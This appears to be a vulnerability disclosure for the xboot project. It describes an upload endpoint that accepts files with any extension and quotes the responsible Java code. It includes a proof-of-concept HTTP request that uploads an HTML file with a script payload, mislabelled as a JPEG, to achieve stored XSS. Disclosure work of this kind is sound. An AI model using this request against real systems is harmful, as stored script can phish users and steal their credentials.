Unrestricted Upload of File with Dangerous Type (CWE-434) /xboot/upload/file #71
Description
Summary
The endpoint "/xboot/upload/file" allows attackers to upload malicious files with arbitrary extensions, potentially creating attack vectors for stored Cross-Site Scripting (XSS), even Remote Code Execution (RCE) attacks.
Details
- xboot-fast/src/main/java/cn/exrick/xboot/modules/base/controller/common/UploadController.java
@Slf4j
@RestController
@Api(tags = "文件上传接口")
@RequestMapping("/xboot/upload")
@Transactional
public class UploadController {
@Value("${xboot.maxUploadFile}")
private Integer maxUploadFile;
@Autowired
private QiniuUtil qiniuUtil;
@RequestMapping(value = "/file", method = RequestMethod.POST)
@ApiOperation(value = "文件上传")
public Result<Object> upload(@RequestParam(required = false) MultipartFile file,
@RequestParam(required = false) String base64) {
if (file.getSize() > maxUploadFile * 1024 * 1024) {
return ResultUtil.error("文件大小过大,不能超过" + maxUploadFile + "MB");
}
if (StrUtil.isNotBlank(base64)) {
// base64上传
file = Base64DecodeMultipartFile.base64Convert(base64);
}
String result;
String fileName = CommonUtil.renamePic(file.getOriginalFilename());
try {
InputStream inputStream = file.getInputStream();
// 上传七牛云服务器
result = qiniuUtil.qiniuInputStreamUpload(inputStream, fileName);
} catch (Exception e) {
log.error(e.toString());
return ResultUtil.error(e.toString());
}
return ResultUtil.data(result);
}
}
- xboot-fast/src/main/java/cn/exrick/xboot/common/utils/CommonUtil.java
public static String renamePic(String fileName) {
String extName = "";
if (fileName.contains(".")) {
extName = fileName.substring(fileName.lastIndexOf("."));
}
return IdUtil.simpleUUID() + extName;
}
POC
POST /xboot/upload/file HTTP/1.1
Host: localhost:9999
Content-Length: 231
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
accessToken: 65aa38a0b6034066bd7a080520dde446
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykm1yoRzGFrNZRql9
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Origin: http://localhost:9999
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9999/open/client
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=GA1.1.1119679874.1749601651; CHAT2DB.USER_ID=2; _ga_V8M4E5SF61=GS2.1.s1749601650$o1$g1$t1749601661$j49$l0$h0; PUBLICCMS_ADMIN=1_98929ca2-feeb-4745-8c8b-83ce96a02974; PUBLICCMS_ANALYTICS_ID=3c11ec88-14ff-4a2d-945e-a76277395bfe; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1752119531,1752119879,1752126651,1752126882; cms.locale=zh; Hm_lvt_64e52d9ed8f5acc3eb7d60058e2fb7ab=1753156816; HMACCOUNT=71B59AD17A941F07; userInfo={%22id%22:%22682265633886208%22%2C%22createBy%22:%22%22%2C%22createTime%22:%222018-05-01%2003:13:51%22%2C%22updateBy%22:%22admin%22%2C%22updateTime%22:%222020-04-30%2004:56:32%22%2C%22delFlag%22:0%2C%22username%22:%22admin%22%2C%22password%22:null%2C%22nickname%22:%22%E7%AE%A1%E7%90%86%E5%91%98%22%2C%22mobile%22:%2218782059031%22%2C%22email%22:%[email protected]%22%2C%22address%22:%22%E5%8C%97%E4%BA%AC%E5%B8%82%2C%E5%B8%82%E8%BE%96%E5%8C%BA%2C%E4%B8%9C%E5%9F%8E%E5%8C%BA%22%2C%22street%22:%22%E5%A4%A9%E5%BA%9C1%E8%A1%97%22%2C%22sex%22:%22%E7%94%B7%22%2C%22passStrength%22:%22%E5%BC%B1%22%2C%22avatar%22:%22https://ooo.0o0.ooo/2019/04/28/5cc5a71a6e3b6.png%22%2C%22type%22:1%2C%22status%22:0%2C%22description%22:%22%E6%88%91%E6%98%AF%E5%A4%A7%E5%B8%85%E9%80%BC%22%2C%22departmentId%22:%2240322777781112832%22%2C%22departmentTitle%22:%22%E6%80%BB%E9%83%A8%22%2C%22birth%22:%222020-04-15%22%2C%22defaultRole%22:null}; videoShowed=videoShowed; Hm_lpvt_64e52d9ed8f5acc3eb7d60058e2fb7ab=1753163004
Connection: close
------WebKitFormBoundarykm1yoRzGFrNZRql9
Content-Disposition: form-data; name="file"; filename="xss.html"
Content-Type: image/jpeg
<script>alert("POC confirmed by ZAST");</script>
------WebKitFormBoundarykm1yoRzGFrNZRql9--
Impact
The Stored XSS vulnerability allows attackers launch attacks via arbitrary javascript code execution, such as phishing, stealing user's credentials, etc